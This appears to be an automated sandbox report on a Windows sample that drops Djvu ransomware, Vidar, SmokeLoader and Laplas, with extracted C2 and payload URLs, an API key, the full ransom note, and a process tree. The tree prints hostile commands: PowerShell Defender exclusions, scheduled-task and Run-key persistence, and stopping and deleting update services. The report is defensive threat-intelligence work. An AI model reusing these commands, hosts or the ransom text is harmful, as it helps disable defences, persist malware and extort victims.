Analysis

  • max time kernel
    82s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2023 21:11

General

  • Target

    1f10f12a467408eed8a74b40a5b3fe98.exe

  • Size

    247KB

  • MD5

    1f10f12a467408eed8a74b40a5b3fe98

  • SHA1

    cc3f600f97f6ae116cb46c04ed08bea5b8cfe2dc

  • SHA256

    9ab1ebd69467b55f55cf35b94c8403a569257784ef929c244649382aeadeee54

  • SHA512

    b07f31817e6991b74aba0f32dc4957527c397759902aa691c1b486e70168a330f88d9dcb749ccf3d6befaee9634f7b9f489cb7b978dc8b2c2b5ffa3c2e2ce6b3

  • SSDEEP

    3072:JN21/4c5L88rOnVkYd81F+eh+c1zCAJI6JgljMpUawvrlKMdGWVroVUJVz:Du/f5L884kfAeoc1JuipyQMwW

Malware Config

Extracted

Family

djvu

C2

http://jiqaz.com/lancer/get.php

Attributes
  • extension

    .hhoo

  • offline_id

    dMMXkgwQTycP13C5xwPbHDSzhx1ZxiPgIMZXewt1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://jiqaz.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-UQkYLBSiQ4 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0648JOsie

rsa_pubkey.plain

Extracted

Family

vidar

Version

2.5

Botnet

19

Attributes
  • profile_id

    19

Extracted

Family

laplas

C2

http://45.159.189.105

Attributes
  • api_key

    ad75d4e2e9636ca662a337b6e798d36159f23acfc89bbe9400d0d451bd8d69fd

Signatures

  • Detected Djvu ransomware 9 IoCs
  • Detects Smokeloader packer 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Modifies security service 2 TTPs 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2376
    • C:\Users\Admin\AppData\Local\Temp\1f10f12a467408eed8a74b40a5b3fe98.exe
      "C:\Users\Admin\AppData\Local\Temp\1f10f12a467408eed8a74b40a5b3fe98.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1488
    • C:\Users\Admin\AppData\Local\Temp\B664.exe
      C:\Users\Admin\AppData\Local\Temp\B664.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4204
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        3⤵
        • Creates scheduled task(s)
        PID:4724
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1028
        3⤵
        • Program crash
        PID:4052
    • C:\Users\Admin\AppData\Local\Temp\B79E.exe
      C:\Users\Admin\AppData\Local\Temp\B79E.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:728
      • C:\Users\Admin\AppData\Local\Temp\B79E.exe
        C:\Users\Admin\AppData\Local\Temp\B79E.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Users\Admin\AppData\Local\64d8e11a-8abd-4be8-a262-892c23b90484" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          4⤵
          • Modifies file permissions
          PID:2296
        • C:\Users\Admin\AppData\Local\Temp\B79E.exe
          "C:\Users\Admin\AppData\Local\Temp\B79E.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3472
          • C:\Users\Admin\AppData\Local\Temp\B79E.exe
            "C:\Users\Admin\AppData\Local\Temp\B79E.exe" --Admin IsNotAutoStart IsNotTask
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:3232
            • C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build2.exe
              "C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build2.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1308
              • C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build2.exe
                "C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build2.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4800
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build2.exe" & exit
                  8⤵
                    PID:3256
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      9⤵
                      • Delays execution with timeout.exe
                      PID:3024
              • C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build3.exe
                "C:\Users\Admin\AppData\Local\f0c8410f-f1bd-4c00-b7e1-2afde40a8979\build3.exe"
                6⤵
                • Executes dropped EXE
                PID:4164
                • C:\Windows\SysWOW64\schtasks.exe
                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                  7⤵
                  • Creates scheduled task(s)
                  PID:3740
      • C:\Users\Admin\AppData\Local\Temp\BCBF.exe
        C:\Users\Admin\AppData\Local\Temp\BCBF.exe
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:260
      • C:\Users\Admin\AppData\Local\Temp\BE56.exe
        C:\Users\Admin\AppData\Local\Temp\BE56.exe
        2⤵
        • Executes dropped EXE
        PID:3052
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 452
          3⤵
          • Program crash
          PID:5032
      • C:\Users\Admin\AppData\Local\Temp\CC23.exe
        C:\Users\Admin\AppData\Local\Temp\CC23.exe
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe
          "C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"
          3⤵
          • Executes dropped EXE
          PID:2328
        • C:\Users\Admin\AppData\Local\Temp\liyy.exe
          "C:\Users\Admin\AppData\Local\Temp\liyy.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2068
          • C:\Users\Admin\AppData\Local\Temp\liyy.exe
            "C:\Users\Admin\AppData\Local\Temp\liyy.exe" -h
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:2988
        • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
          "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          PID:460
      • C:\Users\Admin\AppData\Local\Temp\E086.exe
        C:\Users\Admin\AppData\Local\Temp\E086.exe
        2⤵
        • Executes dropped EXE
        PID:1812
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 812
          3⤵
          • Program crash
          PID:4544
      • C:\Users\Admin\AppData\Local\Temp\E460.exe
        C:\Users\Admin\AppData\Local\Temp\E460.exe
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:3468
      • C:\Users\Admin\AppData\Local\Temp\E664.exe
        C:\Users\Admin\AppData\Local\Temp\E664.exe
        2⤵
        • Executes dropped EXE
        PID:2160
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 452
          3⤵
          • Program crash
          PID:4324
      • C:\Users\Admin\AppData\Local\Temp\43F6.exe
        C:\Users\Admin\AppData\Local\Temp\43F6.exe
        2⤵
        • Executes dropped EXE
        PID:4380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3068
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
          PID:864
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2084
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:388
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4076
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3128
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          2⤵
            PID:456
            • C:\Windows\System32\sc.exe
              sc stop UsoSvc
              3⤵
              • Launches sc.exe
              PID:5000
            • C:\Windows\System32\sc.exe
              sc stop WaaSMedicSvc
              3⤵
              • Launches sc.exe
              PID:2072
            • C:\Windows\System32\sc.exe
              sc stop wuauserv
              3⤵
              • Launches sc.exe
              PID:2132
            • C:\Windows\System32\sc.exe
              sc stop bits
              3⤵
              • Launches sc.exe
              PID:4728
            • C:\Windows\System32\sc.exe
              sc stop dosvc
              3⤵
              • Launches sc.exe
              PID:3324
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
              3⤵
                PID:4692
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                3⤵
                  PID:3340
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                  3⤵
                  • Modifies security service
                  PID:3824
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                  3⤵
                    PID:1548
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    3⤵
                      PID:4316
                  • C:\Users\Admin\AppData\Local\Temp\8A96.exe
                    C:\Users\Admin\AppData\Local\Temp\8A96.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5080
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      3⤵
                        PID:3808
                    • C:\Users\Admin\AppData\Local\Temp\9777.exe
                      C:\Users\Admin\AppData\Local\Temp\9777.exe
                      2⤵
                      • Executes dropped EXE
                      PID:4324
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
                      2⤵
                        PID:2996
                        • C:\Windows\system32\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
                          3⤵
                            PID:2964
                        • C:\Users\Admin\AppData\Local\Temp\C07C.exe
                          C:\Users\Admin\AppData\Local\Temp\C07C.exe
                          2⤵
                            PID:4700
                          • C:\Users\Admin\AppData\Local\Temp\CACE.exe
                            C:\Users\Admin\AppData\Local\Temp\CACE.exe
                            2⤵
                              PID:916
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                3⤵
                                  PID:1780
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 260
                                  3⤵
                                  • Program crash
                                  PID:4752
                              • C:\Users\Admin\AppData\Local\Temp\D677.exe
                                C:\Users\Admin\AppData\Local\Temp\D677.exe
                                2⤵
                                  PID:2068
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  2⤵
                                    PID:1944
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    2⤵
                                      PID:4812
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      2⤵
                                        PID:632
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe
                                        2⤵
                                          PID:4048
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          2⤵
                                            PID:3800
                                          • C:\Windows\SysWOW64\explorer.exe
                                            C:\Windows\SysWOW64\explorer.exe
                                            2⤵
                                              PID:4332
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              2⤵
                                                PID:2512
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe
                                                2⤵
                                                  PID:3528
                                                • C:\Windows\SysWOW64\explorer.exe
                                                  C:\Windows\SysWOW64\explorer.exe
                                                  2⤵
                                                    PID:4200
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                    2⤵
                                                      PID:1720
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3052 -ip 3052
                                                    1⤵
                                                      PID:4124
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4204 -ip 4204
                                                      1⤵
                                                        PID:524
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1812 -ip 1812
                                                        1⤵
                                                          PID:5080
                                                        • C:\Windows\system32\rundll32.exe
                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4900
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                            2⤵
                                                            • Loads dropped DLL
                                                            PID:4280
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 608
                                                              3⤵
                                                              • Program crash
                                                              PID:1528
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4280 -ip 4280
                                                          1⤵
                                                            PID:1360
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2160 -ip 2160
                                                            1⤵
                                                              PID:4992
                                                            • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                              C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:4188
                                                            • C:\Program Files\Notepad\Chrome\updater.exe
                                                              "C:\Program Files\Notepad\Chrome\updater.exe"
                                                              1⤵
                                                                PID:4948
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 916 -ip 916
                                                                1⤵
                                                                  PID:1124
                                                                • C:\Windows\system32\msiexec.exe
                                                                  C:\Windows\system32\msiexec.exe /V
                                                                  1⤵
                                                                    PID:1012
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    1⤵
                                                                      PID:4232
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                        2⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:2988

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Execution

                                                                    Scripting

                                                                    1
                                                                    T1064

                                                                    Scheduled Task

                                                                    1
                                                                    T1053

                                                                    Persistence

                                                                    Modify Existing Service

                                                                    2
                                                                    T1031

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Scheduled Task

                                                                    1
                                                                    T1053

                                                                    Privilege Escalation

                                                                    Scheduled Task

                                                                    1
                                                                    T1053

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    2
                                                                    T1112

                                                                    Impair Defenses

                                                                    1
                                                                    T1562

                                                                    File Permissions Modification

                                                                    1
                                                                    T1222

                                                                    Scripting

                                                                    1
                                                                    T1064

                                                                    Credential Access

                                                                    Credentials in Files

                                                                    3
                                                                    T1081

                                                                    Discovery

                                                                    Query Registry

                                                                    4
                                                                    T1012

                                                                    System Information Discovery

                                                                    4
                                                                    T1082

                                                                    Peripheral Device Discovery

                                                                    1
                                                                    T1120

                                                                    Collection

                                                                    Data from Local System

                                                                    3
                                                                    T1005

                                                                    Command and Control

                                                                    Web Service

                                                                    1
                                                                    T1102

                                                                    Impact

                                                                    Service Stop

                                                                    1
                                                                    T1489

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Program Files\Notepad\Chrome\updater.exe
                                                                      Filesize

                                                                      3.7MB

                                                                      MD5

                                                                      3006b49f3a30a80bb85074c279acc7df

                                                                      SHA1

                                                                      728a7a867d13ad0034c29283939d94f0df6c19df

                                                                      SHA256

                                                                      f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                                      SHA512

                                                                      e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                                    • C:\ProgramData\mozglue.dll
                                                                      Filesize

                                                                      593KB

                                                                      MD5

                                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                                      SHA1

                                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                      SHA256

                                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                      SHA512

                                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                    • C:\ProgramData\nss3.dll
                                                                      Filesize

                                                                      2.0MB

                                                                      MD5

                                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                                      SHA1

                                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                      SHA256

                                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                      SHA512

                                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                    • C:\Users\Admin\AppData\Local\64d8e11a-8abd-4be8-a262-892c23b90484\B79E.exe
                                                                      Filesize

                                                                      749KB

                                                                      MD5

                                                                      087f75c142ef66212e79e99f26abf68a

                                                                      SHA1

                                                                      44999a5c4ad01c3cc48868a49c81ef79d183d429

                                                                      SHA256

                                                                      571d2d43b09ac4c8183bc452988e271691402d4e9a14775f7483bb645c4b702b

                                                                      SHA512

                                                                      3f730e93b41b3b6ac061a120ed9e54ef5b3591e766eafcb375b3c3890a1d04367dc59f6709b9c0c96d00f0e686ae921425f600f8c0f692fe15530d264ee8862a

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                      SHA1

                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                      SHA256

                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                      SHA512

                                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      bd5940f08d0be56e65e5f2aaf47c538e

                                                                      SHA1

                                                                      d7e31b87866e5e383ab5499da64aba50f03e8443

                                                                      SHA256

                                                                      2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                                                      SHA512

                                                                      c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      8c76dee4a40be03f3f96d194341d5853

                                                                      SHA1

                                                                      d4c4e0e9fe3ae23dcb438369d773822ca7393379

                                                                      SHA256

                                                                      271270743045d98c3b6da92d5a846e395a325394791ae4169c402668827c24cb

                                                                      SHA512

                                                                      d1052ecd7500a5082aeb5ba4e48ac491a3d1c7a817a9a93015003b62175145360b68de2e377c8b5dd018e9dbf0f4050ce8235e2eab5633c75dd2525cbd3394eb

                                                                    • C:\Users\Admin\AppData\Local\Temp\43F6.exe
                                                                      Filesize

                                                                      3.7MB

                                                                      MD5

                                                                      e44d10eb30f15a9ce272887a5e72ea0a

                                                                      SHA1

                                                                      e55ea4e51321904a180a91dbb712056fe500678f

                                                                      SHA256

                                                                      3e370c5cd2a2326c4e01fad6e22c74913d73c0a80c47e5c26b806120c20b6fa2

                                                                      SHA512

                                                                      3ed458f979f7e84e4e1d8b26df32a395b744530e8b634ab2972ca7934b57a17b5dea6ac99363bd4c90cf6bb4aa6a0e50a540416fe998736ab3fb3d9165de4c5f

                                                                    • C:\Users\Admin\AppData\Local\Temp\43F6.exe
                                                                      Filesize

                                                                      3.7MB

                                                                      MD5

                                                                      e44d10eb30f15a9ce272887a5e72ea0a

                                                                      SHA1

                                                                      e55ea4e51321904a180a91dbb712056fe500678f

                                                                      SHA256

                                                                      3e370c5cd2a2326c4e01fad6e22c74913d73c0a80c47e5c26b806120c20b6fa2

                                                                      SHA512

                                                                      3ed458f979f7e84e4e1d8b26df32a395b744530e8b634ab2972ca7934b57a17b5dea6ac99363bd4c90cf6bb4aa6a0e50a540416fe998736ab3fb3d9165de4c5f

                                                                    • C:\Users\Admin\AppData\Local\Temp\8A96.exe
                                                                      Filesize

                                                                      8.4MB

                                                                      MD5

                                                                      d38e84427edbc6789f1bb12ae69c6dc5

                                                                      SHA1

                                                                      718aa1778e1ad4a23b53adea4dbabeeb39b89f94

                                                                      SHA256

                                                                      bd4e3e2c455b2322b4b874a319a14c638e6b567c7c1e83edc839ac05aee1a6a4

                                                                      SHA512

                                                                      271966fc13137d5cda7eb9283c3c9c77361dd10d37eef713d0ac9c08326d930c1202d7470f1f2ad9e66f2a798354f09ce846139a8e2ca2b91d7719c215a68948

                                                                    • C:\Users\Admin\AppData\Local\Temp\8A96.exe
                                                                      Filesize

                                                                      8.4MB

                                                                      MD5

                                                                      d38e84427edbc6789f1bb12ae69c6dc5

                                                                      SHA1

                                                                      718aa1778e1ad4a23b53adea4dbabeeb39b89f94

                                                                      SHA256

